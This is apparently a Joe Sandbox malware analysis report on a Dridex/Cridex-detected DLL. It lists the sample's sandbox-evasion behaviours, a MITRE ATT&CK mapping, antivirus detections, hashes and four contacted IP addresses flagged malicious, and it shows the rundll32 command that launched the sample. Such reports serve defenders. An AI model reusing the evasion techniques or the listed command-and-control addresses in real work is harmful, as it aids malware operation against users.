Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000008.00000003.307864938.0000000000CF6000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307414987.0000000000CF6000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb` source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6ECFF6A8 push esi; mov dword ptr [esp], 00000000h

1_2_6ECFF6A9

Source: initial sample

Static PE information: section where entry point is pointing to: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\System32\loaddll32.exe

Section loaded: OutputDebugStringW count: 1181

Source: C:\Windows\System32\loaddll32.exe

Window / User API: threadDelayed 1180

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6ED00730 GetTokenInformation,GetSystemInfo,GetTokenInformation,

1_2_6ED00730

Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WerFault.exe, 00000008.00000002.324457894.0000000004B70000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.322684693.0000000004B70000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.8.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: WerFault.exe, 00000008.00000002.324337692.0000000004B30000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW`
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6ECF6D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

1_2_6ECF6D0C

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6ED03138 RtlAddVectoredExceptionHandler,

1_2_6ED03138

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1

Jump to behavior

Source: loaddll32.exe, 00000001.00000002.692606291.0000000001A00000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.303018264.0000000002FA0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.300956661.0000000002FA0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000001.00000002.692606291.0000000001A00000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.303018264.0000000002FA0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.300956661.0000000002FA0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.692606291.0000000001A00000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.303018264.0000000002FA0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.300956661.0000000002FA0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.692606291.0000000001A00000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.303018264.0000000002FA0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.300956661.0000000002FA0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

1_2_6ECF6D0C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

1_2_6ECF6D0C

Source: Amcache.hve.LOG1.8.dr, Amcache.hve.8.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.LOG1.8.dr, Amcache.hve.8.dr	Binary or memory string: procexp.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion11	OS Credential Dumping	Security Software Discovery31	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	24%	Virustotal		Browse
SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	26%	ReversingLabs	Win32.Worm.Cridex

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.2.rundll32.exe.6ecf0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
4.0.rundll32.exe.6ecf0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
4.0.rundll32.exe.6ecf0000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
4.2.rundll32.exe.7d0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.loaddll32.exe.d90000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.loaddll32.exe.6ecf0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
4.0.rundll32.exe.7d0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.0.rundll32.exe.7d0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.n4pkg6fy8o.gaDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.8.dr	false		high
http://www.n4pkg6fy8o.gaDVarFileInfo$	loaddll32.exe, 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.301065037.000000006ED0F000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.4.135.27	unknown	Greece	199246	TOPHOSTGR	true
85.10.248.28	unknown	Germany	24940	HETZNER-ASDE	true
80.211.3.13	unknown	Italy	31034	ARUBA-ASNIT	true
144.91.122.102	unknown	Germany	51167	CONTABODE	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	544194
Start date:	22.12.2021
Start time:	20:34:01
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.evad.winDLL@6/6@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 53.8% (good quality ratio 51.4%) Quality average: 78.6% Quality standard deviation: 27.7%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.42.73.29 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.4.135.27	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse
85.10.248.28	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TOPHOSTGR	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	185.4.135.27
	Positive_Result_75184731.xls	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse	185.4.135.27
HETZNER-ASDE	triage_dropped_file.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	85.10.248.28
	UGDLmAm2UI.exe	Get hash	malicious	Browse	176.9.111.171
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	85.10.248.28
	Positive_Result_75184731.xls	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	tTy0oHh7FM.exe	Get hash	malicious	Browse	148.251.234.83
	ykTwsaBnqa.exe	Get hash	malicious	Browse	144.76.84.177
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	85.10.248.28

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_f87e517ca7ba4e3ba229cb2ffa35583e25899a_82810a17_1ad75c0f\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9222363616068773
Encrypted:	false
SSDEEP:	192:4miE0oXSN/HBUZMX4jed+yL/u7sGS274ItWc:ViyXSN/BUZMX4je3L/u7sGX4ItWc
MD5:	CDBEF812024E2E1A36A4FE1846B67068
SHA1:	4665E12F1152E0C07821A73B2E9934274CB58624
SHA-256:	8C4EAC5F11909246248BCD4E4B6FC6B30B856A8A8C72D7445F5F34EB9E0A1BFA
SHA-512:	1A3D7F9ECAB3DE733B0DC929106FF20D226785AB28403BDA1DA4BCB23AF65187E0366C12E87BE865E8A63988E29782A3CB8B2432C9A57678E35162FD324E4B06
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.4.7.0.7.7.0.7.4.9.9.8.5.9.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.4.7.0.7.7.1.2.0.4.6.7.3.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.3.9.3.8.5.1.c.-.f.4.1.9.-.4.e.f.c.-.9.a.f.f.-.1.4.a.7.5.1.4.b.1.3.7.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.2.e.e.e.3.7.-.e.9.b.4.-.4.2.6.8.-.b.0.9.6.-.f.3.b.a.b.8.8.d.4.0.c.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.b.4.-.0.0.0.1.-.0.0.1.c.-.5.3.f.c.-.b.4.7.2.b.6.f.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4413.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Dec 23 04:35:08 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	43756
Entropy (8bit):	2.139472296500077
Encrypted:	false
SSDEEP:	192:JW+KDgVEc6yLjO5SkbmQwB/eKaGyPCAl5JA71mzccYB3AMI33Yq:hS5LbpwB/5aGyPCAzJs1mzccxYq
MD5:	726F7DFB2AE28150549639AC21BA4D43
SHA1:	607E2C2C07BDCF0974819C42937456F5097002BC
SHA-256:	1E3D0693B1E6AF37F2EEEE0C048673E18D3F45F30C7D56EB1632F47FFB0BACC6
SHA-512:	34CC19013C01779619EE975ED24949FAD970EBB6605716B4CF32E78FE64F07008DF7D9573EE32B776D97D86EEE4174B0C22583E9ED926EFBF3C16DF4F18827DC
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......\|..a.........................................-..........T.......8...........T...............$............................................................................................U...........B...... .......GenuineIntelW...........T...........u..a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4AEA.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8326
Entropy (8bit):	3.690869333314738
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiqd067OgsG6YDo6EgmfT/CSsCprQ89ba5ysfH+m:RrlsNiqe6f6YM6EgmfT/CS5a5xfH
MD5:	2A3D2B8E09AC194B63597EE85C79E92E
SHA1:	EB1E1D40175BE420BD94D136BC7C71C0B79BB6F1
SHA-256:	47579AE72C9A54D68DEC1AAD71A8E9AACBFCA7DA1411EC9BB1FC014B782FD0B3
SHA-512:	F203B26566A7E752AE62A93722CE0A092FFE7B96929190020E994777F6E8289729BCD4664E0A50F5C5E9A39645CA5449CF4B6C0F7760E2E0E3A78B3AE14BCB98
Malicious:	false
Reputation:	low
